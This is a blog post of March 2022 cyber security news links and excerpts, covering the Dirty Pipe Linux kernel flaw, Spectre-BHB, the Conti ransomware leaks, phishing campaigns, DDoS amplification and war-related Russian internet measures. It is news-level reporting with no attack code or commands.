Cyber security news March 2022

This posting is here to collect cyber security news in March 2022.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

888 Comments

  1. Tomi Engdahl says:

    “Dirty Pipe” Linux kernel bug lets anyone write to any file >

    “Dirty Pipe” Linux kernel bug lets anyone write to any file
    https://nakedsecurity.sophos.com/2022/03/08/dirty-pipe-linux-kernel-bug-lets-anyone-to-write-to-any-file/

    Very greatly simplified, if you have a pipe that you are allowed to write to and a file that you aren’t…

    …then, sometimes, writing into the pipe’s memory buffer may inadvertently also modify the kernel’s temporary in-memory copies – the so-called cache pages – of various parts of the disk file.

    Annoyingly, even if the file is flagged as “read only” by the operating system itself, modifying its underlying kernel cache is treated as a “write”.

    As a result, the modified cache buffer is flushed back to disk by the kernel, permanently updating the contents of the stored file, despite any operating system permissions applied to it.

    Even a physically unwritable file, such as one on a CD-ROM or an SD card with the write-enable switch turned off, will appear to have been modified for as long as the corrupted cache buffers are kept in memory by the kernel.

    Which versions are affected?
    For those running Linux who want to cut to the chase and check if they’re patched, Kellermann reports that this bug was introduced (at least in its current, easily exploitable form) in kernel 5.8.

    That means three officially supported kernel flavours are definitely at risk: 5.10, 5.15 and 5.16.

    The bug was patched in 5.10.102, 5.15.25 and 5.16.11, so if you have a version that is at or above one of those, you’re OK.

    Apparently, Android is affected too, and although a fix for the vulnerability was incorporated into the kernel source code on 2022-02-24, neither Google’s Android Security Bulletin for March 2022, nor the company’s Pixel-specific notes, mention this bug, now dubbed CVE-2022-0847.

    Of all the numerous officially supported Android handsets we’ve surveyed so far, the only ones we heard of that use kernel 5.10 are the Google Pixel 6 and the Samsung S22 series (reports suggest both of these are still on 5.10.43 [2022-03-09T12:00Z]).

    Most devices seem still to be using one of the older-but-apparently-not-vulnerable Linux 5.4 or 4.x versions.

    Intriguingly, Kellermann discovered the vulnerability due to intermittent corruption of HTTP log files on his company’s network.

    He had a server process that would regularly take daily logfiles, compressed using the Unix-friendly gzip utility, and convert them into monthly logfiles in the Windows-friendly ZIP format for customers to download.

    with perseverance, he was able to create two minimalist programs, with just three and five lines of code respectively, that reproduced the misbehaviour in a way that could only be blamed on the kernel.

    Following that, he was able to construct a proof-of-concept attack that allows an unprivileged user to modify even a well-locked-down file such as your list of trusted SSH keys, or the list of “known good” digital signatures you’re willing to connect to for updates.

    Reply
  2. Tomi Engdahl says:

    Internet backbone provider Lumen quits Russia
    Disconnects small group of customers to protect ‘integrity of the global internet’
    https://www.theregister.com/2022/03/09/lumen_quits_russia/

    Lumen Technologies, the internet backbone provider formerly known as CenturyLink, has quit Russia.

    The biz’s announcement is titled, “Lumen’s readiness to meet global events,” and does not take a position on the morality of the illegal invasion of Ukraine. Instead, it frames the decision as necessary “due to increased security risk inside Russia” and “to ensure the security of our and our customers’ networks, as well as the ongoing integrity of the global internet.”

    Those are rather different reasons to those expressed by fellow backbone provider Cogent, which made opposition to the invasion its main reason for cutting off Russian customers.

    Lumen has also admitted that the sole physical link it controls in Russia is not material to its business, and it serves an “extremely small number of enterprise customers” in the nation.

    It is, however, taking steps to shut down its Russian operations “from a legal and regulatory standpoint as well as taking other steps for exiting the business in region.”

    The company also serves some customers in Ukraine, and has pledged to abide by the West’s sanctions against Moscow as required.

    While Lumen’s rationale for leaving Russia lacks the ideological aspect behind others’ similar decisions, it further isolates Russia from the global community

    Russia has already introduced new legislation that makes mentioning the invasion in the media an offense – only the false term “special military action” is allowed – and is also cracking down on the limited demonstrations protesting such matters that have taken place within its borders.

    Other tech-related entities to quit Russia include global consultancies, Visa and Mastercard, and software vendors Oracle and SAP.

    Reply
  3. Tomi Engdahl says:

    Where are the (serious) Russian cyberattacks?
    Sure, HermeticWiper and IssacWiper are bad, but they’re not BAD in capital letters
    https://www.theregister.com/2022/03/09/where_are_the_russian_cyberattacks/

    I’m heartsick over Russia’s invasion of Ukraine. But, before it began, I’d been really worried about Russian cyberattacks, which would overrun Ukraine and flood into the West’s infrastructure.

    I foresaw the Russian GRU Sandworm hacking group launching a cyber attack that would ruin the European Union’s power grid or wreck major US internet sites such as Google, Facebook, and Microsoft – or stop cellular services in their tracks.

    I was wrong. So far, anyway.

    Oh certainly HermeticWiper and IssacWiper – which will wipe all your data and your software and operating system for good measure – will ruin your day, but even together neither will make whole companies or countries miserable. And, to no-one’s surprise Russia and its puppets have launched Distributed Denial of Service (DDoS) attacks on Ukrainian sites.

    But, where are those massive attacks? Why is Ukraine’s electrical system still up and running – except for damaged nuclear reactors? Why, instead of shutting down Ukraine’s TV networks with cyber attacks, did they have to blow up a Kyiv TV tower? Did we just let paranoia overrule our common sense?

    It’s clear that Putin thought he’d easily overrun Ukraine. He was wrong.

    Reply
  4. Tomi Engdahl says:

    Google Blocks Chinese Phishing Campaign Targeting U.S. Government
    https://www.securityweek.com/google-blocks-chinese-phishing-campaign-targeting-us-government

    Google says it has blocked a phishing campaign originating from China and aimed at Gmail users associated with the U.S. government.

    The attacks, Google Threat Analysis Group (TAG) director Shane Huntley said on Tuesday, happened in February and were completely blocked. According to him, TAG has no evidence that these attacks are related to the war in Ukraine.

    “In February, we detected an APT31 phishing campaign targeting high profile Gmail users affiliated with the U.S. government. 100% of these emails were automatically classified as spam and blocked by Gmail,” Huntley said.

    Also tracked as Zirconium, Judgment Panda, and Red Keres, the Chinese hacking group is known for the targeting of entities in the United States, Canada, and various European countries, including Belarus, Finland, and France. Last year, the group also targeted Russia.

    Reply
  5. Tomi Engdahl says:

    Intel, AMD, Arm warn of new speculative execution CPU bugs https://www.bleepingcomputer.com/news/security/intel-amd-arm-warn-of-new-speculative-execution-cpu-bugs/
    Security researchers have found new a new way to bypass existing hardware-based defenses for speculative execution in modern computer processors from Intel, AMD, and Arm. Today, the three CPU manufacturers have published advisories accompanied by mitigation updates and security recommendations to tackle recently discovered issues that allow leaking of sensitive information despite isolation-based protections. See also:
    https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/branch-history-injection.html.
    See also:
    https://www.amd.com/system/files/documents/software-techniques-for-managing-speculation.pdf.
    See also:
    https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability/spectre-bhb

    Reply
  6. Tomi Engdahl says:

    Russian government sites hacked in supply chain attack https://www.bleepingcomputer.com/news/security/russian-government-sites-hacked-in-supply-chain-attack/
    Russia says some of its federal agencies’ websites were compromised in a supply chain attack on Tuesday after unknown attackers hacked the stats widget used to track the number of visitors by multiple government agencies. The list of sites impacted in the attack includes the websites of the Energy Ministry, the Federal State Statistics Service, the Federal Penitentiary Service, the Federal Bailiff Service, the Federal Antimonopoly Service, the Culture Ministry, and other Russian state agencies. The incident was discovered Tuesday evening after the attackers published their own content and blocked access to the websites.

    Reply
  7. Tomi Engdahl says:

    Apteekkihuijarit vaanivat nyt vanhuksia varoita läheisiäsi
    https://www.iltalehti.fi/tietoturva/a/3ab57809-b1d5-4fbd-8606-d471cf45bf53
    Avainapteekit-ketjun nimissä liikkuu nyt huijaussähköpostiviestejä, joilla yritetään kalastella suomalaisten tietoja tai huijata rahaa.
    Huijausviestit vaikuttavat aidoilta ja ne on muotoiltu muistuttamaan Avainapteekkien aitoja uutiskirjeitä. Viesteissä yritetään saada avaamaan linkki huijaussivustolle, jolla kalastellaan yksityistietoja ja luottokorttitietoja. Tietojen antaminen voi johtaa rahallisiin menetyksiin esimerkiksi tilaushuijausten muodossa tai pahimmillaan identiteettivarkauteen.

    Reply
  8. Tomi Engdahl says:

    Exploit chain allows security researchers to pwn phone system https://portswigger.net/daily-swig/exploit-chain-allows-security-researchers-to-pwn-phone-system
    Security researchers have been able to chain together three separate vulnerabilities to achieve the complete compromise of Pascom’s Cloud Phone System. Full pre-authenticated remote code execution (RCE) on the business-focused Voice over IP (VoIP) and more general communication platform was achieved by Daniel Eshetu of Ethiopian infosec firm Kerbit by combining a trio of less serious security flaws. For its part, Pascom said it wanted to “thank KerbitSec for the quick and effective cooperation in ensuring we closed these vulnerabilities!”. See also: https://kerbit.io/research/read/blog/4

    Reply
  9. Tomi Engdahl says:

    New Nokoyawa Ransomware Possibly Related to Hive https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html
    Hive, which is one of the more notable ransomware families of 2021, made waves in the latter half of the year after breaching over 300 organizations in just four months allowing the group to earn what could potentially be millions of US dollars in profit. In March 2022, we came across evidence that another, relatively unknown, ransomware known as Nokoyawa is likely connected with Hive, as the two families share some striking similarities in their attack chain, from the tools used to the order in which they execute various steps. Currently, the majority of Nokoyawa’s targets are located in South America, primarily in Argentina.

    Reply
  10. Tomi Engdahl says:

    Hackers fork open-source reverse tunneling tool for persistence https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/
    Security experts have spotted an interesting case of a suspected ransomware attack that employed custom-made tools typically used by APT (advanced persistent threat) groups. Although no concrete connection between groups has been uncovered, the operational tactics, targeting scope, and malware customization capabilities signify a potential connection. See also:
    https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf

    You compromised a Windows / Linux / Mac server during your external audit. This server is located inside a LAN network and you want to establish connections to other machines on this network.
    Ligolo can setup a tunnel to access internal server’s resources.

    Reply
  11. Tomi Engdahl says:

    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities https://unit42.paloaltonetworks.com/gke-autopilot-vulnerabilities/
    In February 2021, Google announced Autopilot, a new mode of operation in Google Kubernetes Engine (GKE). With Autopilot, Google provides a “hands-off” Kubernetes experience, managing cluster infrastructure for the customer. The platform automatically provisions and removes nodes based on resource consumption and enforces secure Kubernetes best practices out of the box. In June 2021, Unit 42 researchers disclosed several vulnerabilities and attack techniques in GKE Autopilot to Google. Users able to create a pod could have abused these to (1) escape their pod and compromise the underlying node, (2) escalate privileges and become full cluster administrators, and (3) covertly persist administrative access through backdoors that are completely invisible to cluster operators. An attacker who obtained an initial foothold on an Autopilot cluster, for example, through a compromised developer’s account, could have exploited these issues to escalate privileges and become a “shadow administrator, ” with the ability to covertly exfiltrate secrets, deploy malware or cryptominers and disrupt workloads.

    Reply
  12. Tomi Engdahl says:

    Attackers exploit fundamental flaw in the web’s security to steal $2 million in cryptocurrency https://freedom-to-tinker.com/2022/03/09/attackers-exploit-fundamental-flaw-in-the-webs-security-to-steal-2-million-in-cryptocurrency/
    On Thursday, Feb. 3, 2022, attackers stole approximately $2 million worth of cryptocurrency from users of the Korean crypto exchange KLAYswap. This theft exploited systemic vulnerabilities in the Internet’s routing ecosystem and in the Public Key Infrastructure (PKI), leaving the Internet’s most sensitive financial, medical and other websites vulnerable to attack. Attackers exploited a technique known as a Border Gateway Protocol (BGP) hijack to launch this attack.
    What is unprecedented in this attack (to our knowledge) is the complete bypassing of the cryptographic protections offered by the TLS protocol. Using its BGP hijack, the adversary first targeted the PKI and launched a man-in-the-middle attack on the certificate distribution process. Only after it had acquired a valid digital certificate for the target domain did it aim its attack towards real users by serving its malicious javascript file over an encrypted connection.

    Reply
  13. Tomi Engdahl says:

    Linux-ytimessä aukko – uudetkin älypuhelimet vaarassa
    https://etn.fi/index.php/13-news/13285-linux-ytimessae-aukko-uudetkin-aelypuhelimet-vaarassa

    Linux-ydintä kehittää maailman suurin avoimen koodin kehittäjien joukko. Koodista löytyy korjattavaa, mutta varsin harvoin varsinaisia haavoittuvuuksia, jotka ovat riksejä järjestelmälle. Niitäkin kuitenkin löytyy. Sellainen on esimerkiksi Dirty Pipe -niminen haavoittuvuus.

    Tietoturvatutkija Max Kellermann CM4all-hostausyrityksestä törmäsi bugiin, kun asiakkaan Linux-koneeseen alkoi ilmestyä korruptoituneita tiedostoja. Kellermann selvitti kuukausia kaikkia mahdollisia syitä, minkä takia sivupyyntöjen lokitiedostoihin ilmestyi korruptoituneita tiedostoja. Lopulta syyksi osoittautui haavoittuvuus Linux-kernelissä.

    Haavoittuvuus on ilmestynyt Linux-ytimeen versiossa 5.8, joka julkaistiin elokuussa 2020. Se on korjattu versioiden 5.16.11, 5.15.25 ja 5.10.102 julkaisun myötä. Haavoittuvuus on mukana myös kaikissa Android-versioissa, jotka perustuvat 5.8-kerneliin. Tällainen on esimerkiksi Samsungin uusi Galaxy S22 -sarja, jonka Android 12 -käyttöjärjestelmä perustuu Linuxin versioon 5.10.43.

    Dirty Pipe johtuu alustamattomasta muuttujasta, jonka avulla hyökkääjä voi korvata minkä tahansa välimuistissa olevan tiedoston sisällön. Dirty Pipe voi tehdä tämän, vaikka tiedostoon ei voisi kirjoittaa.

    Reply
  14. Tomi Engdahl says:

    The Dirty Pipe Vulnerability
    https://dirtypipe.cm4all.com/

    This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.

    Reply
  15. Tomi Engdahl says:

    Ukrainan sota vahvisti haittaohjelmien yleistymistä
    https://www.uusiteknologia.fi/2022/03/10/ukrainan-sota-vahvisti-haittaohjelmien-yleistymista/

    Yhdysvaltalaisen Check Point Research mukaan maailman yleisin haitakeohjelma oli helmikuussa Emotet, joka on saanut lisäpontta Ukrainan sodasta kertovista haitallisia sähköpostiliitteistä. Suomen yleisin kyberkiusa oli edelleen kiristysohjelma Netwalker.

    Tietoturvatalo Check Point tutkimustoiminnasta vastaavanCheck Point Research (CPR) mukaan Emotet on edelleen yleisin haittaohjelma vaikuttaen viiteen prosenttiin organisaatioista maailmanlaajuisesti. Sen sijaan toinen haitakeohjelma Trickbot on pudonnut top10-listan kuudennelle sijalle.

    Vuonna 2021 Tri ylsi yleisimpien haittaohjelmien kärkeen seitsemän kertaa.

    https://blog.checkpoint.com/2022/03/09/february-2022s-most-wanted-malware-emotet-remains-number-one-while-trickbot-slips-even-further-down-the-index/

    Reply
  16. Tomi Engdahl says:

    Malware Posing as Russia DDoS Tool Bites Pro-Ukraine Hackers https://threatpost.com/malware-posing-russia-ddos-tool-bites-pro-ukraine-hackers/178864/
    Be careful when downloading a tool to cyber-target Russia: It could be an infostealer wolf dressed in sheep’s clothing that grabs your cryptocurrency info instead. also:
    https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html

    Reply
  17. Tomi Engdahl says:

    Russia creates its own TLS certificate authority to bypass sanctions https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/
    Russia has created its own trusted TLS certificate authority (CA) to solve website access problems that have been piling up after sanctions prevent certificate renewals. However, for new Certificate Authorities
    (CA) to be trusted by web browsers, they first needed to be vetted by various companies, which can take a long time. Currently, the only web browsers that recognize Russia’s new CA as trustworthy are the Russia-based Yandex browser and Atom products, so Russian users are told to use these instead of Chrome, Firefox, Edge, etc.

    Reply
  18. Tomi Engdahl says:

    Leaks of Conti Ransomware Group Paint Picture of a Surprisingly Normal Tech Start-Up Sort Of https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/
    Conti’s structure is almost a classic organizational hierarchy, with team leaders who report to upper management, but to their credit there are many instances of different groups working with each other directly (this is called “horizontal information flow”, and is a Good Thing and a sign of organizational health, as any steeple-handed thinkfluencer will happily tell you). also:
    https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/

    Reply
  19. Tomi Engdahl says:

    Middleboxes now being used for DDoS attacks in the wild, Akamai finds https://portswigger.net/daily-swig/middleboxes-now-being-used-for-ddos-attacks-in-the-wild-akamai-finds
    In 2021, researchers warned about a new kind of DDoS attack that took advantage of network middleboxes to carry out reflection amplification on the TCP protocol. Last week, Akamai reported the first wave of TCP middlebox reflection DDoS attacks in the wild. Akamai’s findings show that malicious actors are starting to add TCP middlebox reflection to their arsenal and possibly honing it for larger attacks in the future.

    Reply
  20. Tomi Engdahl says:

    Credentials Leaks on VirusTotal
    https://isc.sans.edu/diary/rss/28426
    A few weeks ago, researchers published some information about stolen credentials that were posted on Virustotal. I’m keeping an eye on VT for my customers and searching for data related to them. For example, I looking for their domain name(s) inside files posted on VT. I may confirm what researchers said, there are a lot of passwords leaks shared on VTI but yesterday, there was a peak of files uploaded on this platform.

    Reply
  21. Tomi Engdahl says:

    New Variant of Spectre Attack Bypasses Intel and Arm Hardware Mitigations
    https://www.securityweek.com/new-variant-spectre-attack-bypasses-intel-and-arm-hardware-mitigations

    A team of researchers from the Vrije Universiteit Amsterdam in the Netherlands has demonstrated a new Spectre attack variant that can bypass hardware mitigations implemented in recent years by Intel and Arm.

    Since the disclosure of the Spectre and Meltdown vulnerabilities back in January 2018, researchers have continued looking into the security of processors and they have found several other side-channel attack methods. These methods can typically allow an attacker with local access to the targeted machine to obtain small bits of potentially sensitive data from memory.

    When the Spectre vulnerability was found, the most dangerous variant was called Spectre v2 or Spectre BTI (Branch Target Injection). Affected CPU makers, such as Intel and Arm, have been developing hardware mitigations to prevent these types of exploits.

    However, VU Amsterdam researchers this week disclosed the details of what they have described as an “extension of Spectre v2.” The new variant, dubbed Branch History Injection (BHI) and Spectre-BHB, bypasses those hardware mitigations. Another slightly different variant uncovered by the researchers is called Intra-mode BTI (IMBTI).

    “The mitigations [implemented by Intel and Arm] work as intended, but the residual attack surface is much more significant than vendors originally assumed,” the researchers explained.

    They demonstrated their findings by creating what they described as a “neat end-to-end exploit leaking arbitrary kernel memory on modern Intel CPUs.” They have also released a video showing the exploit in action.

    Reply
  22. Tomi Engdahl says:

    Vodafone Investigating Source Code Theft Claims
    https://www.securityweek.com/vodafone-investigating-source-code-theft-claims

    Vodafone has launched an investigation after a cybercrime group claimed to have stolen hundreds of gigabytes of source code from the telecoms giant.

    The hacker group, calling itself “Lapsus$,” claims to have obtained roughly 200 Gb of source code files, allegedly representing approximately 5,000 GitHub repositories.

    In an emailed statement, Vodafone confirmed that it’s aware of the claims and said an investigation has been launched.

    “We are investigating the claim together with law enforcement, and at this point we cannot comment on the credibility of the claim,” Vodafone told SecurityWeek. “However, what we can say is that generally the types of repositories referenced in the claim contain proprietary source code and do not contain customer data.”

    Reply
  23. Tomi Engdahl says:

    1Password Increases Top Bug Bounty Reward to $1 Million
    https://www.securityweek.com/1password-increases-top-bug-bounty-reward-1-million

    Password management software vendor 1Password today announced that it is willing to pay up to $1 million to researchers able to steal secrets from its vault.

    The top reward is offered as part of the company’s bug bounty program that has been running on Bugcrowd for years.

    Since 2017, the top reward offered through the bug bounty program has been $100,000. Despite hundreds of attempts, however, no researcher has claimed it so far.

    Over the past four years, 1Password paid out $103,000 in bug bounty rewards to participating researchers. To date, a total of 115 payouts were handed out via Bugcrowd, at an average of $900 per reward, but only for minor vulnerabilities.

    The newly announced $1 million reward is expected to attract more researchers to the bug bounty program and help 1Password further improve the security of its products.

    Researchers looking to earn the $1 million reward need to break into a white box testing account to retrieve a flag – a note that contains bad poetry.

    Reply
  24. Tomi Engdahl says:

    U.S. Warns of Conti Ransomware Attacks as Gang Deals With Leak Fallout
    https://www.securityweek.com/us-warns-conti-ransomware-attacks-gang-deals-leak-fallout

    The U.S. government has reissued an alert warning organizations about Conti ransomware attacks as the cybercrime group deals with the recent leaks.

    An alert originally released in September 2021 was reissued recently by CISA, FBI, NSA and the U.S. Secret Service. The alert contains technical details on Conti attacks, as well as indicators of compromise (IoCs) that can be useful to defenders.

    Shortly after Russia launched an invasion of Ukraine, the Conti group announced its support for Russia, threatening to attack the critical infrastructure of “enemies.” They later revised their statement to say that they condemned the war, but the threat to launch cyber operations in response to the West’s actions remained.

    A few days after Conti made the announcement, an individual — a Ukrainian security researcher or possibly a rogue member of the Conti group — started leaking files related to the gang’s operations. The leaks started with some chat logs on February 27 and continued with other files, including Conti ransomware source code, on March 1.

    The U.S. government said in its updated alert that the Conti threat actors appeared to remain active, with its victim count rising to more than 1,000.

    MDR company eSentire this week reported that the Conti group announced attacks against more than 50 organizations between November 27, 2021, and February 28, 2022.

    Reply
  25. Tomi Engdahl says:

    Teboilin verkkosivuilla on pelottava ilmoitus – tästä on kyse https://www.is.fi/digitoday/tietoturva/art-2000008674882.html

    Reply
  26. Tomi Engdahl says:

    Google: Russian Hackers Target Ukrainians, European Allies via Phishing Attacks
    https://thehackernews.com/2022/03/google-russian-hackers-target.html?m=1

    A broad range of threat actors, including Fancy Bear, Ghostwriter, and Mustang Panda, have launched phishing campaigns against Ukraine, Poland, and other European entities amid Russia’s invasion of Ukraine.

    Google’s Threat Analysis Group (TAG) said it took down two Blogspot domains that were used by the nation-state group FancyBear (aka APT28) – which is attributed to Russia’s GRU military intelligence – as a landing page for its social engineering attacks.

    The disclosure comes close on the heels of an advisory from the Computer Emergency Response Team of Ukraine (CERT-UA) warning of phishing campaigns targeting Ukr.net users that involve sending messages from compromised accounts containing links to attacker-controlled credential harvesting pages.

    Reply
  27. Tomi Engdahl says:

    UPS flaws allow for remote code execution and remote fire-based interruptions
    Hooking up uninterruptible power supplies with TLS implementation errors automatically to a cloud service could potentially lead to a burning sensation
    https://www.zdnet.com/article/ups-flaws-allow-for-remote-code-execution-and-remote-fire-based-interruptions/

    Reply
  28. Tomi Engdahl says:

    In-the-wild DDoS attack can be launched from a single packet to create terabytes of traffic
    A test mode that shouldn’t be exposed to the internet from a PBX-to-internet gateway responsible for amplification ratio of 4,294,967,296 to 1.
    https://www.zdnet.com/article/in-the-wild-ddos-attack-can-be-launched-from-a-single-packet-to-create-terabytes-of-traffic/

    Reply
  29. Tomi Engdahl says:

    Why You Should Be Using CISA’s Catalog of Exploited Vulns
    It’s a great starting point for organizations that want to ride the wave of risk-based vulnerability management rather than drowning beneath it.
    https://www.darkreading.com/vulnerabilities-threats/why-you-should-be-using-cisa-s-catalog-of-exploited-vulns

    Reply
  30. Tomi Engdahl says:

    Millions of APC Smart-UPS devices vulnerable to TLStorm
    Critical vulns spotted in popular Schneider kit
    https://www.theregister.com/2022/03/09/tlstorm_apc_ups_critical_zero_days/

    Reply
  31. Tomi Engdahl says:

    Russia Is Preparing to Cut Itself Off From the Global Internet
    The Kremlin is getting ready to bring down the digital Iron Curtain.
    https://www.vice.com/en/article/88gevb/russia-is-preparing-to-cut-itself-off-from-the-global-internet

    Reply
  32. Tomi Engdahl says:

    APT41 Spies Broke Into 6 US State Networks via a Livestock App
    https://threatpost.com/apt41-spies-broke-into-6-us-state-networks-via-livestock-app/178838/

    The China-affiliated state-sponsored threat actor used Log4j and zero-day bugs in the USAHerds animal-tracking software to hack into multiple government networks.

    USAHerds – an app used (PDF) by farmers to speed their response to diseases and other threats to their livestock – has itself become an infection vector, used to pry open at least six U.S. state networks by one of China’s most prolific state-sponsored espionage groups.

    Reply
  33. Tomi Engdahl says:

    US critical infrastructure hit by ransomware
    A ransomware variant has hit at least 52 critical national infrastructure firms in the US
    https://www.itsecurityguru.org/2022/03/09/us-critical-infrastructure-hit-by-ransomware/

    Reply

Leave a Reply to Tomi Engdahl Cancel reply

Your email address will not be published. Required fields are marked *

*

*